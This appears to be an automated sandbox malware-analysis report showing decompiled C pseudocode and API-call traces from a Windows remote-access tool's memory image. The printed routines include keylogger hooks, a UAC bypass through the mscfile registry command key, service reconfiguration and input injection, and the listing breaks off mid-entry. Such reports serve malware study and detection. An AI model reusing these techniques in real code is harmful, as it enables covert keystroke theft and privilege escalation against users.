                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(__ecx);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        				E0041203B("[ALARM]",  &_v6, "Alarm has been triggered!",  &_v5, _t13);
                                        				PlaySoundW(_a4, GetModuleHandleA(0), 0x20009);
                                        				Sleep(0x2710);
                                        				return PlaySoundW(0, 0, 0);
                                        			}

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Alarm has been triggered!,?,?,?,00411AE8,00000000), ref: 00411B08
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ALARM],?), ref: 00411B1C
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00411B31
                                        • PlaySoundW.WINMM(?,00000000), ref: 00411B41
                                        • Sleep.KERNEL32(00002710), ref: 00411B48
                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00411B54
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@PlaySoundV10@$?c_str@?$basic_string@HandleLocalModuleSleepTimeV10@0@V10@@printf
                                        • String ID: Alarm has been triggered!$[ALARM]
                                        • API String ID: 4004766653-1190268461
                                        • Opcode ID: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                        • Instruction ID: 5adc9307e5d744e325bca41e58bf78e276225457fadb31193265d37fe82570ce
                                        • Opcode Fuzzy Hash: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                        • Instruction Fuzzy Hash: 09F08971744218BFEA0077A5DC4BFED3E2DEB44741F400025FD01D61D4EAE069408AEA
                                        Uniqueness
                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 50%
                                        			E0040D8FF() {
                                        				void* _t10;
                                        				char* _t12;
                                        				int _t13;
                                        				char* _t15;
                                        				signed int _t16;
                                        				char* _t18;
                                        				void* _t41;
                                        				void* _t46;
                                        				intOrPtr _t51;
                                        
                                        				_t51 =  *0x41bf20; // 0x0
                                        				 *0x41c119 = 0;
                                        				if(_t51 != 0) {
                                        					E004020F4(_t10, 0x41bf20);
                                        				}
                                        				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t46 - 0x10, _t51, 0));
                                        				_t12 = E0040180C(_t46 - 0x10, _t51, 3);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t13 = atoi(_t12);
                                        				E0040F572();
                                        				_t15 = E0040180C(_t46 - 0x10, _t51, 2);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t16 = atoi(_t15);
                                        				_t18 = E0040180C(_t46 - 0x10, _t16, 1);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				E0040F5F4(_t41, _t52, atoi(_t18), _t16 & 0xffffff00 | _t16 != 0x00000000, _t13);
                                        				E004017DD(_t46 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D928
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D93A
                                        • atoi.MSVCRT ref: 0040D947
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D95E
                                        • atoi.MSVCRT ref: 0040D965
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D97A
                                        • atoi.MSVCRT ref: 0040D981
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                          • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@$??4?$basic_string@V01@V01@@closesocket
                                        • String ID:
                                        • API String ID: 2234106156-0
                                        • Opcode ID: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                        • Instruction ID: b6bede96aa3c2da0a069e28b117ba5bdb23d63fcfc1ec7a11f567b0dfa856408
                                        • Opcode Fuzzy Hash: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                        • Instruction Fuzzy Hash: 8C111C72A00218DBCB04BBF1EC599EE7769EB94355B00883EE512E71E1EF784909CB5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000), ref: 00403224
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040322D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 0040324D
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00403278
                                          • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                          • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                          • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                          • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                          • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                          • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00403297
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                        • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                        • API String ID: 1883807236-2313358711
                                        • Opcode ID: 58e6912436aa6a0f7ff26497d16348cffd3a4bc0f52e92236de34c747d335e76
                                        • Instruction ID: 820ff65b2e21daf85941f98613c9b2fccc28e61cad3948ad9cf2f03c1057e28e
                                        • Opcode Fuzzy Hash: 58e6912436aa6a0f7ff26497d16348cffd3a4bc0f52e92236de34c747d335e76
                                        • Instruction Fuzzy Hash: E1110A72A40554B7DB0267A9DC55BEF7B6DCB85300F0040B6F905A72C1DA780B0647EE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 19%
                                        			E00405CCA(struct HHOOK__** __ecx) {
                                        				char _v5;
                                        				char _v6;
                                        				void* _t9;
                                        				struct HHOOK__* _t16;
                                        				struct HHOOK__** _t30;
                                        
                                        				_push(__ecx);
                                        				_t30 = __ecx;
                                        				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
                                        					_t9 = 0;
                                        				} else {
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
                                        					E00405DD3(__ecx);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        					E0041203B("[INFO]",  &_v6, "Online Keylogger Stopped",  &_v5, "Online Keylogger Stopped");
                                        					_t30[0xf] = 0;
                                        					_t6 =  &(_t30[0xd]); // 0x0
                                        					_t30[0xa] = 0;
                                        					CloseHandle( *_t6);
                                        					if(_t30[0xf] == 0) {
                                        						_t16 =  *_t30;
                                        						if(_t16 != 0) {
                                        							UnhookWindowsHookEx(_t16);
                                        							 *_t30 = 0;
                                        						}
                                        					}
                                        					_t9 = 1;
                                        				}
                                        				return _t9;
                                        			}

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040D1F8,0040D2A6,00000001), ref: 00405CE9
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405D00
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405D14
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • CloseHandle.KERNEL32(00000000), ref: 00405D2B
                                        • UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@CloseEventHandleHookUnhookV01@@V10@0@Windowsfreemallocprintfsprintf
                                        • String ID: Online Keylogger Stopped$[INFO]
                                        • API String ID: 2254939683-2146459034
                                        • Opcode ID: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                        • Instruction ID: 054b4bc7c437e62fba5109071e9382fc7819d51c50d88b2d3918446dea0eff9a
                                        • Opcode Fuzzy Hash: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                        • Instruction Fuzzy Hash: 7701F575600A04AFD710BB69DC898FFBBACEE85240340497FE84293241D779AD458FA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410483
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041049B
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104B0
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104C3
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104DA
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104F1
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410508
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: InputSend
                                        • String ID:
                                        • API String ID: 3431551938-0
                                        • Opcode ID: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                        • Instruction ID: b328bb317d865897fc6c08efdded885432bfecfaa75727484ced0e6d4c13fc0d
                                        • Opcode Fuzzy Hash: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                        • Instruction Fuzzy Hash: F03121B1D5124EA9EB11EF949981FFFBFBCAF18301F504026E640B6142D3B446859BE6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 48%
                                        			E00411927(void* _a4, signed char _a20) {
                                        				short* _t6;
                                        				signed int _t9;
                                        				void* _t14;
                                        				short* _t17;
                                        				int _t19;
                                        				void* _t21;
                                        				void* _t22;
                                        
                                        				_t17 = 0;
                                        				_t6 = OpenSCManagerW(0, 0, 2);
                                        				_t22 = _t6;
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t21 = OpenServiceW(_t22, _t6, 2);
                                        				if(_t21 != 0) {
                                        					_t19 =  &_a4 | 0xffffffff;
                                        					_t9 = _a20 & 0x000000ff;
                                        					if(_t9 == 0) {
                                        						_push(4);
                                        						goto L8;
                                        					} else {
                                        						_t14 = _t9 - 1;
                                        						if(_t14 == 0) {
                                        							_push(2);
                                        							goto L8;
                                        						} else {
                                        							if(_t14 == 1) {
                                        								_push(3);
                                        								L8:
                                        								_pop(_t19);
                                        							}
                                        						}
                                        					}
                                        					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
                                        					CloseServiceHandle(_t22);
                                        					CloseServiceHandle(_t21);
                                        				} else {
                                        					CloseServiceHandle(_t22);
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t17;
                                        			}

                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,Function_0001B310,?,?,00410FD9), ref: 00411933
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00410FD9), ref: 00411986
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411998
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 0041199B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                        • String ID:
                                        • API String ID: 760094045-0
                                        • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                        • Instruction ID: c2fa0ded83cb97236bb08be5de2499f982cdcb79c4471a71361dcbc3e7912862
                                        • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                        • Instruction Fuzzy Hash: 2201D2B1120528BAE6001B709C99EFB3F5CEF453B0B044226F632961E0CA644D81C9E9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 28%
                                        			E00401A5E(intOrPtr* __eax, void* __eflags, void* _a8) {
                                        				char _v20;
                                        				char _v36;
                                        				void* _t18;
                                        				void* _t20;
                                        				intOrPtr _t39;
                                        
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t39 =  *__eax;
                                        				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				E004129EB(__eflags,  &_v20,  &_v36,  &E0041B310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                        				_t18 = _t39 - 0x9b;
                                        				if(_t18 == 0) {
                                        					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C( &_v20, __eflags, 1));
                                        					 *0x41b288 = 1;
                                        					_t20 = E0040180C( &_v20, __eflags, 0);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        					E004020C2(0x41b240, 0x9c, _t20);
                                        				} else {
                                        					if(_t18 == 0) {
                                        						E00401B26();
                                        					}
                                        				}
                                        				E004017DD( &_v20);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401A68
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 00401A80
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401A90
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401A9F
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
